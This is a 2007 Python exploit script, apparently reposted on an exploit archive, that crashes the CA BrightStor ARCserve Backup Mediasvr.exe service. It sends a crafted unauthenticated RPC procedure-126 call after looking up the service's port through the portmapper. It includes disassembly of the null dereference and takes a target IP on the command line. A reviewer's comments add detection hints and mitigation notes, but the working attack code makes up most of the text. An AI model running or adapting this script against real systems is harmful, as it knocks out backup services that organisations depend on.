CA BrightStor Backup 11.5.2.0 Mediasvr.exe Denial of Service Exploit
# ====================================================================
# CA BrightStor Backup 11.5.2.0 Mediasvr.exe Denial of Service Exploit
# ====================================================================
#!/usr/bin/python
#
# Computer Associates (CA) Brightstor Backup Mediasvr.exe DoS (catirpc.dll/rwxdr.dll)
# (Previously Unknown)
#
# There is an issue with RPC operation 126 and the imported catirpc.dll
# and rwxdr.dll. It looks as if Mediasvr.exe identifies a Bad Job Handle
# as seen in its log file.
#
# Log Message:
# asms_manager_job_enumerate_devices_1_svc(): Bad Job Handle.
#
# However, the process dies when trying to send an RPC response
# for the bad job handle. This is caused by a null memory dereference.
# Within catirpc.dll, the xdr_rwpair function is called:
#
# Catirpc.dll:2E008A93 loc_2E008A93:
# Catirpc.dll:2E008A93 mov ecx, [esi+10h]
# Catirpc.dll:2E008A96 push ecx   <- ECX is 0x0041B310 (nulls)
# Catirpc.dll:2E008A97 push edi   <- EDI is 0x009e2580 (nulls)
# Catirpc.dll:2E008A98 call dword ptr [esi+14h]   <- points to 0x2d6054f0
# Catirpc.dll:2E008A9B add esp, 8                    (rwxdr.dll:xdr_rwpair)
# Catirpc.dll:2E008A9E pop edi
# Catirpc.dll:2E008A9F pop esi
# Catirpc.dll:2E008AA0 pop ebx
# Catirpc.dll:2E008AA1 retn
#
# rwxdr.dll:xdr_rwpair
# .text:2D6054F0 public xdr_rwpair
# .text:2D6054F0 xdr_rwpair proc near
# .text:2D6054F0
# .text:2D6054F0 arg_0= dword ptr 4
# .text:2D6054F0 arg_4= dword ptr 8
# .text:2D6054F0
# .text:2D6054F0 push ebx
# .text:2D6054F1 mov ebx, [esp+4+arg_4]     <--- puts 0x0041B310
# .text:2D6054F5 push esi
# .text:2D6054F6 push edi
# .text:2D6054F7 mov edi, [esp+0Ch+arg_0]   <--- puts 0x009e2580
# .text:2D6054FB mov esi, [ebx]             <---- EBX is 0x00000000
# .text:2D6054FD mov eax, [edi]             <---- EDI is 0x00000000
# .text:2D6054FF test eax, eax
# .text:2D605501 jnz short loc_2D605533
# .text:2D605503 mov eax, [esi+4]           <---- ESI is set to 0x00000000
#
# This was tested on BrightStor ARCserve Backup 11.5.2.0 (SP2) with the latest
# CA patches on Windows XP SP2
#
# CA has been notified
#
# Author: M. Shirk
#
# (c) Copyright 2007 (Shirkdog Security) shirkdog_list $ at % hotmail dot com
#
# Use at your own Risk: You have been warned
#------------------------------------------------------------------------
#
# Reviewer notes (defensive reading of this listing):
# - This is Python 2 source (print statements, byte data held in str,
#   ord() applied to single characters of the socket reply).
# - The script makes two TCP connections: one to the portmapper on port 111
#   to look up the port registered for RPC program 0x0006097e version 1,
#   then one to that port carrying a single call to procedure 0x7e (126).
#   Both are visible on the wire, so a portmapper lookup for that program
#   number from an unexpected host, followed by a procedure-126 call, is a
#   usable detection point.
# - On the host, the header comment above gives the matching log line
#   ("Bad Job Handle" from asms_manager_job_enumerate_devices_1_svc) that
#   precedes the Mediasvr.exe crash.
# - Limiting which hosts can reach TCP 111 and the Mediasvr RPC port reduces
#   exposure until a vendor fix is applied; the page itself names no fixed
#   version.
# - os, time and struct are imported but not used anywhere in the listing.
#------------------------------------------------------------------------

import os
import sys
import time
import socket
import struct

#------------------------------------------------------------------------

#Start of RPC Packet
# Reads as an ONC RPC call over TCP: a 4-byte record marker (0x8000005c),
# then 0x6b9b72bc, 0x00000000 and 0x00000002 -- presumably XID, message type
# CALL and RPC version 2; confirm against a capture.
# NOTE(review): the marker declares 0x5c (92) bytes, but only 44 bytes follow
# it once all four pieces below are concatenated.
rpc_packet="\x80\x00\x00\x5c\x6b\x9b\x72\xbc\x00\x00\x00\x00\x00\x00\x00\x02"
#Program ID, and Operation 126
# Program 0x0006097e, version 1, procedure 0x7e (126).
rpc_packet+="\x00\x06\x09\x7e\x00\x00\x00\x01\x00\x00\x00\x7e"
#nulls after Operation
# In a standard ONC RPC call these 16 zero bytes sit where the credential and
# verifier (flavor 0, length 0) go, i.e. no authentication is presented --
# presumably the service accepts the call unauthenticated; verify.
rpc_packet+="\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
#4 more bytes of junk (ALL HAIL BEEF)
rpc_packet+="\xde\xad\xbe\xef"

# Need to get the port Mediasvr.exe is listening on
# Portmapper request: record marker 0x80000038 (56 bytes, matching the data
# that follows), program 0x000186a0 (100000, portmapper) version 2 procedure 3,
# 16 zero bytes, then the lookup arguments: program 0x0006097e, version 1,
# protocol 6 (TCP), port 0.
rpc_portmap_req="\x80\x00\x00\x38\x21\x84\xf7\xc9\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x86\xa0\x00\x00\x00\x02\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x09\x7e\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00\x00"

#------------------------------------------------------------------------

def ExploitMediaSvr(target,port):
    """Open one TCP connection to target:port, send rpc_packet, and close.

    No reply is read; the status text printed afterwards is unconditional and
    does not verify the state of the remote service.
    """
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.connect((target, port))
    sock.send(rpc_packet)
    sock.close()
    print '[+] Done...\n[+] Mediasvr.exe is dead\n[+] ... or it will die in a few seconds for you inpatient bastards\n'

def GetMediaSvrPort(target):
    """Ask the portmapper on target (TCP 111) for the Mediasvr RPC port.

    Sends rpc_portmap_req, takes the last four bytes of the reply as the
    port number, prints it, and passes target and port to ExploitMediaSvr.
    """
    sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    sock.connect((target,111))
    sock.send(rpc_portmap_req)
    # NOTE(review): a single recv() with no length check; a reply shorter than
    # four bytes makes the negative indexing below raise IndexError. This
    # socket is also never closed in this function.
    rec = sock.recv(256)

    # The last four bytes of the reply are taken as the port value.
    port1 = rec[-4]
    port2 = rec[-3]
    port3 = rec[-2]
    port4 = rec[-1]

    # Each byte is converted to a hex string and back to int, then the four
    # values are joined as eight hex digits and parsed as one integer, which
    # amounts to reading the four bytes as a big-endian number.
    port1 = hex(ord(port1))
    port2 = hex(ord(port2))
    port3 = hex(ord(port3))
    port4 = hex(ord(port4))
    port = '%02x%02x%02x%02x' % (int(port1,16),int(port2,16),int(port3,16),int(port4,16))

    port = int(port,16)

    print '[+] Sending TCP Packet of Death to Target: %s Port: %s' % (target,port)
    ExploitMediaSvr(target,port)

if __name__=="__main__":
    # The only command-line argument is the target address; when it is
    # missing, the banner and usage line are printed and the script exits
    # with status -1.
    try:
        target = sys.argv[1]
    except IndexError:
        print '[+] Computer Associates (CA) Brightstor Backup Mediasvr.exe DoS (catirpc.dll/rwxdr.dll)'
        print '[+] Author: Shirkdog'
        print '[+] Usage: %s <target ip>\n' % sys.argv[0]
        sys.exit(-1)

    print '[+] Computer Associates (CA) Brightstor Backup Mediasvr.exe DoS (catirpc.dll/rwxdr.dll)'
    print '[+] Author: Shirkdog'

    GetMediaSvrPort(target)

# 0day.today [2024-11-15] #